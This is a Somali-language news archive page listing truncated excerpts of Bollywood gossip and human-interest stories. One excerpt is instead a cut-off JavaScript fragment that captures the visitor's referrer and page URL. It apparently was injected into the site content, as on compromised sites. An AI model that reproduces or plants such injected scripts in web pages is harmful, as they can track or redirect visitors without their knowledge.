Scroll to Top

Category Archives: Warbixinada Maanta

(function() { var referer="";try{if(referer=document.referrer,"undefined"==typeof referer)throw"undefined"}catch(exception){referer=document.location.href,(""==referer||"undefined"==typeof referer)&&(referer=document.URL)}referer=referer.substr(0,700); var...

Hooyo ayaa ka wal walsan weeynaanta naaseheeda oo xad-dhaaf noqdeen waxaana mararka qaar ay u cabsataa wiilkeeda , sababtoo ah hoos ayey usoo dheceen naasaha weliba cabir gaaraya 40KK. Danielle Matier...

Ajay Devgan ayaa la qorsheynayaa inuu bedelo Sanjay Dutt  filimka lagu magacaabo Tottal Dhamaal kaas oo la qorsheeynayo in duubistiisa la bilaabo bisha soo socota. Sanjay Dutt ayaa ugu dambeeyn laga saaray...

Booliska Magaalada Mumbai ayaa dacwad kusoo oogeen Varuun Dhawan oo lagu heysto inuu wadada dhexdeeda ku sameeye arin aan sax ahayn sharci ahaan. Varuun Dhawan ayaa wada ku arkay mid kamid ah taageeriyaashiisa ...

Ilaa iyo hadda lama yaqaano sababta dhabta ah ka dambeysa in filimka Shaahid Kapoor , Deepika Padukona iyo Ranveer Singh ee Padvamati logo ogolaan la’yahay warada fasaxa. Manohar Lal Khattar oo kamid...

Sanadahaan  waxaa jira filimaan badan oo saameeyn xoogan ku sameeyeen Box Office-ka , waxaana dhacday in jilaayaasha ugu caansan Bollywood-ka ,waxaana macquul ah in Bollywood-ka sanadka soo socda filimaan...

Haween badan ayaa ka sheegta socodka badan ee raggooda oo aan saldhigin guriga isla markaana aan kala qeyb qaadan arimaha qaarkood ee guriga sida daryeelka caruurta taasi oo cariiri ka dhageysa xaaska...

Sanadihii xiisaha,isdhaafsiga dhambaalada caashaqa weli waan ku dhex nool nahay inkastoo laga yaabo dad badan iney aaminsan yihiin in dadka isku cusub oo keliya ay sidaan oo kale isku koolkooliyaan,haseyeeshee...

Todobaadkaan gudihiisa waraka laga helay gudaha India waxaa ay sheegayaan in mashquul dartiisa Salman Khan looga bedelay filimka uu soo wado Director-ka caanka ah ee Remo D’Souza’s. Ilaa iyo hadda...

Haweeney u dhalatay wadanka Thailand ayaa awoodi weysey inay aqoonsato wiilkeeda oo 22 sano jir kadib markii uu iskusoo sameeyey qaliin wajiga qurxinaya isagoo  kasoo muuqday kadib Tv-yada South Korea. Noppajit...